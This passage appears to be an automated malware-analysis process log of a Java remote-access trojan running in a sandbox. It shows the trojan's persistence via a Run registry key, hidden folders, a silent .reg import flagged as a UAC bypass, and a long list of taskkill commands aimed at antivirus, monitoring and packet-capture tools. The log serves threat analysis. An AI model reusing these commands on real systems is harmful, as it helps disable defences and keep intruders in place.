- Opens file in notepad (likely ransom note)
PID:5948

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:5616

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7028
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0F54C05A\sky.drive
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4748
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0F5CC81A\r.Mz
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:7128

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2912
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0F58A2DA\MANIFEST.MF
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:7072

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:2864
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0F5F94BA\JRat.class
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3172

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\scoped_dir1472_918258677\CRX_INSTALL\128.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:6876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:1252

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6640

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:2892
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.75593683573902959210679538602524672.class
  2⤵
  - Drops file in System32 directory
  PID:2364
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1944394118975243078.vbs
    3⤵
    PID:3168
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1944394118975243078.vbs
      4⤵
      PID:4408
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive59136703809806291.vbs
    3⤵
    PID:4800
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive59136703809806291.vbs
      4⤵
      PID:6560
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe
    3⤵
    PID:3440
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2376820016835034468.vbs
  2⤵
  PID:1712
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2376820016835034468.vbs
    3⤵
    PID:6184
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3415179238894024664.vbs
  2⤵
  PID:4004
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3415179238894024664.vbs
    3⤵
    PID:6860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:6528
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1052
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:972
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:5560
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  PID:3820
- - C:\Users\Admin\AppData\Roaming\Oracle\bin\java.exe
    C:\Users\Admin\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\Admin\AppData\Local\Temp\_0.807513685087138187947885413878160.class
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:3556
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1357732718170955353.vbs
      4⤵
      PID:4936
    - - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1357732718170955353.vbs
        5⤵
        
        PID:7016
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3345637336077559213.vbs
      4⤵
      PID:5848
    - - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3345637336077559213.vbs
        5⤵
        
        PID:4864
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      4⤵
      PID:4076
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2908535951086032669.vbs
    3⤵
    PID:1036
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2908535951086032669.vbs
      4⤵
      PID:1188
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3466649327997337167.vbs
    3⤵
    PID:6996
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3466649327997337167.vbs
      4⤵
      PID:5420
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe
    3⤵
    PID:4996
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c regedit.exe /s C:\Users\Admin\AppData\Local\Temp\HjqUJjIeLJ6822399783673334554.reg
    3⤵
    PID:6440
  - - C:\Windows\regedit.exe
      regedit.exe /s C:\Users\Admin\AppData\Local\Temp\HjqUJjIeLJ6822399783673334554.reg
      4⤵
      UAC bypass
      Event Triggered Execution: Image File Execution Options Injection
      Runs .reg file with regedit
      PID:5932
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM UserAccountControlSettings.exe /T /F
    3⤵
    PID:6416
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Taskmgr.exe /T /F
    3⤵
    PID:7048
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ProcessHacker.exe /T /F
    3⤵
    PID:6756
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM procexp.exe /T /F
    3⤵
    PID:3196
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MSASCui.exe /T /F
    3⤵
    PID:636
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MsMpEng.exe /T /F
    3⤵
    PID:6912
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MpUXSrv.exe /T /F
    3⤵
    PID:1572
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MpCmdRun.exe /T /F
    3⤵
    PID:2896
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM NisSrv.exe /T /F
    3⤵
    PID:4464
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ConfigSecurityPolicy.exe /T /F
    3⤵
    PID:2092
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM procexp.exe /T /F
    3⤵
    PID:6168
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM wireshark.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1276
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM tshark.exe /T /F
    3⤵
    PID:2332
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM text2pcap.exe /T /F
    3⤵
    PID:5728
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM rawshark.exe /T /F
    3⤵
    PID:6104
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mergecap.exe /T /F
    3⤵
    PID:4872
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM editcap.exe /T /F
    3⤵
    PID:1348
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM dumpcap.exe /T /F
    3⤵
    PID:6992
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM capinfos.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6020
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mbam.exe /T /F
    3⤵
    PID:5852
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mbamscheduler.exe /T /F
    3⤵
    PID:6424
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM mbamservice.exe /T /F
    3⤵
    PID:4492
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AdAwareService.exe /T /F
    3⤵
    PID:6292
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AdAwareTray.exe /T /F
    3⤵
    PID:620
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM WebCompanion.exe /T /F
    3⤵
    PID:6460
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AdAwareDesktop.exe /T /F
    3⤵
    PID:2004
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Main.exe /T /F
    3⤵
    PID:6912
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Svc.exe /T /F
    3⤵
    PID:2740
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Up.exe /T /F
    3⤵
    PID:4528
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3SP.exe /T /F
    3⤵
    PID:2796
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Proxy.exe /T /F
    3⤵
    PID:4576
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM V3Medic.exe /T /F
    3⤵
    PID:6168
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BgScan.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1764
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuard.exe /T /F
    3⤵
    PID:6360
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuardBhvScanner.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6564
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuarScanner.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:4484
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM LittleHook.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:7008
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BullGuardUpdate.exe /T /F
    3⤵
    PID:5932
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM clamscan.exe /T /F
    3⤵
    PID:5488
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ClamTray.exe /T /F
    3⤵
    PID:1964
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ClamWin.exe /T /F
    3⤵
    PID:644
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM cis.exe /T /F
    3⤵
    PID:940
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM CisTray.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5396
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM cmdagent.exe /T /F
    3⤵
    PID:4836
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM cavwp.exe /T /F
    3⤵
    PID:3988
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM dragon_updater.exe /T /F
    3⤵
    PID:2480
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MWAGENT.EXE /T /F
    3⤵
    PID:6716
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MWASER.EXE /T /F
    3⤵
    PID:4184
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM CONSCTLX.EXE /T /F
    3⤵
    PID:6720
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM avpmapp.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5668
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM econceal.exe /T /F
    3⤵
    PID:6040
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM escanmon.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6888
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM escanpro.exe /T /F
    3⤵
    PID:4152
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM TRAYSSER.EXE /T /F
    3⤵
    PID:6776
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM TRAYICOS.EXE /T /F
    3⤵
    - Kills process with taskkill
    PID:6704
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM econser.exe /T /F
    3⤵
    PID:6796
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM VIEWTCP.EXE /T /F
    3⤵
    PID:5940
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FSHDLL64.exe /T /F
    3⤵
    PID:1688
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fsgk32.exe /T /F
    3⤵
    PID:1284
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fshoster32.exe /T /F
    3⤵
    PID:6396
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FSMA32.EXE /T /F
    3⤵
    PID:1348
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fsorsp.exe /T /F
    3⤵
    PID:7140
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fssm32.exe /T /F
    3⤵
    PID:1496
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FSM32.EXE /T /F
    3⤵
    - Kills process with taskkill
    PID:4236
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM trigger.exe /T /F
    3⤵
    PID:6424
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FProtTray.exe /T /F
    3⤵
    PID:6440
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FPWin.exe /T /F
    3⤵
    PID:6596
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FPAVServer.exe /T /F
    3⤵
    PID:6672
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVK.exe /T /F
    3⤵
    PID:6896
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GdBgInx64.exe /T /F
    3⤵
    PID:2212
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKProxy.exe /T /F
    3⤵
    PID:6304
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GDScan.exe /T /F
    3⤵
    PID:6140
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKWCtlx64.exe /T /F
    3⤵
    PID:4872
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKService.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5644
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AVKTray.exe /T /F
    3⤵
    PID:1228
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GDKBFltExe32.exe /T /F
    3⤵
    PID:6956
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM GDSC.exe /T /F
    3⤵
    PID:1088
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM virusutilities.exe /T /F
    3⤵
    PID:940
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM guardxservice.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:3104
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM guardxkickoff_x64.exe /T /F
    3⤵
    PID:4724
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM iptray.exe /T /F
    3⤵
    PID:1176
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM freshclam.exe /T /F
    3⤵
    PID:4588
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM freshclamwrap.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:3372
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7RTScan.exe /T /F
    3⤵
    PID:6840
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7FWSrvc.exe /T /F
    3⤵
    PID:3968
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7PSSrvc.exe /T /F
    3⤵
    PID:5932
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7EmlPxy.EXE /T /F
    3⤵
    - Kills process with taskkill
    PID:6208
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSecurity.exe /T /F
    3⤵
    PID:6108
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7AVScan.exe /T /F
    3⤵
    PID:6020
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7CrvSvc.exe /T /F
    3⤵
    PID:5276
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7SysMon.Exe /T /F
    3⤵
    PID:6940
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMain.exe /T /F
    3⤵
    PID:6000
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMngr.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6720
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nanosvc.exe /T /F
    3⤵
    PID:4992
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nanoav.exe /T /F
    3⤵
    PID:1944
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nnf.exe /T /F
    3⤵
    PID:4908
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nvcsvc.exe /T /F
    3⤵
    PID:3296
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nbrowser.exe /T /F
    3⤵
    PID:2272
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nseupdatesvc.exe /T /F
    3⤵
    PID:6720
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nfservice.exe /T /F
    3⤵
    PID:5056
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nwscmon.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6708
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM njeeves2.exe /T /F
    3⤵
    PID:1336
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nvcod.exe /T /F
    3⤵
    PID:4600
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nvoy.exe /T /F
    3⤵
    PID:6744
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM zlhh.exe /T /F
    3⤵
    PID:6164
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Zlh.exe /T /F
    3⤵
    PID:5668
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM nprosec.exe /T /F
    3⤵
    PID:6296
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Zanda.exe /T /F
    3⤵
    PID:6092
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM NS.exe /T /F
    3⤵
    PID:2832
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM acs.exe /T /F
    3⤵
    PID:3800
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM op_mon.exe /T /F
    3⤵
    PID:4184
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PSANHost.exe /T /F
    3⤵
    PID:4704
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PSUAMain.exe /T /F
    3⤵
    PID:6552
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PSUAService.exe /T /F
    3⤵
    PID:5244
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM AgentSvc.exe /T /F
    3⤵
    PID:2460
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BDSSVC.EXE /T /F
    3⤵
    PID:6400
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM EMLPROXY.EXE /T /F
    3⤵
    PID:7080
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM OPSSVC.EXE /T /F
    3⤵
    PID:3236
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ONLINENT.EXE /T /F
    3⤵
    PID:1628
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM QUHLPSVC.EXE /T /F
    3⤵
    - Kills process with taskkill
    PID:6688
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SAPISSVC.EXE /T /F
    3⤵
    PID:5908
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SCANNER.EXE /T /F
    3⤵
    PID:5024
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SCANWSCS.EXE /T /F
    3⤵
    PID:6436
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM scproxysrv.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6600
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM ScSecSvc.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:3216
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SUPERAntiSpyware.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6172
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SASCore64.exe /T /F
    3⤵
    PID:7016
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SSUpdate64.exe /T /F
    3⤵
    PID:1884
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SUPERDelete.exe /T /F
    3⤵
    PID:1240
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SASTask.exe /T /F
    3⤵
    PID:808
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7RTScan.exe /T /F
    3⤵
    PID:5092
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7FWSrvc.exe /T /F
    3⤵
    PID:7044
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7PSSrvc.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6792
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7EmlPxy.EXE /T /F
    3⤵
    PID:412
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSecurity.exe /T /F
    3⤵
    PID:1892
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7AVScan.exe /T /F
    3⤵
    PID:1772
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7CrvSvc.exe /T /F
    3⤵
    PID:5416
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7SysMon.Exe /T /F
    3⤵
    PID:3016
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMain.exe /T /F
    3⤵
    PID:6636
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM K7TSMngr.exe /T /F
    3⤵
    PID:6888
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiWinMgr.exe /T /F
    3⤵
    PID:676
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiWatchDog.exe /T /F
    3⤵
    PID:1596
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiSeAgnt.exe /T /F
    3⤵
    PID:3436
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PtWatchDog.exe /T /F
    3⤵
    PID:2680
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PtSvcHost.exe /T /F
    3⤵
    PID:5380
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM PtSessionAgent.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:1592
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM coreFrameworkHost.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:5176
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM coreServiceShell.exe /T /F
    3⤵
    PID:4616
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM uiUpdateTray.exe /T /F
    3⤵
    PID:1712
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM VIPREUI.exe /T /F
    3⤵
    PID:5156
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SBAMSvc.exe /T /F
    3⤵
    PID:5892
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SBAMTray.exe /T /F
    3⤵
    PID:6644
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SBPIMSvc.exe /T /F
    3⤵
    PID:4568
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM bavhm.exe /T /F
    3⤵
    PID:3600
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavSvc.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6588
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavTray.exe /T /F
    3⤵
    PID:3624
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM Bav.exe /T /F
    3⤵
    PID:6792
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavWebClient.exe /T /F
    3⤵
    PID:6052
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM BavUpdater.exe /T /F
    3⤵
    PID:6068
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCShieldCCC.exe /T /F
    3⤵
    PID:1508
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCShieldRTM.exe /T /F
    3⤵
    PID:4916
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCShieldDS.exe /T /F
    3⤵
    PID:3664
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM MCS-Uninstall.exe /T /F
    3⤵
    PID:7052
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDScan.exe /T /F
    3⤵
    PID:6732
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDFSSvc.exe /T /F
    3⤵
    PID:3648
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDWelcome.exe /T /F
    3⤵
    PID:4184
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM SDTray.exe /T /F
    3⤵
    PID:6172
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM UnThreat.exe /T /F
    3⤵
    PID:5552
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM utsvc.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:7040
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiClient.exe /T /F
    3⤵
    PID:3172
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fcappdb.exe /T /F
    3⤵
    PID:3668
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FCDBlog.exe /T /F
    3⤵
    PID:5284
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FCHelper64.exe /T /F
    3⤵
    PID:4864
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM fmon.exe /T /F
    3⤵
    PID:2144
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiESNAC.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:2228
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiProxy.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:6708
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiSSLVPNdaemon.exe /T /F
    3⤵
    PID:1920
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiTray.exe /T /F
    3⤵
    PID:2480
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM FortiFW.exe /T /F
    3⤵
    PID:3304
- - C:\Windows\SYSTEM32\taskkill.exe
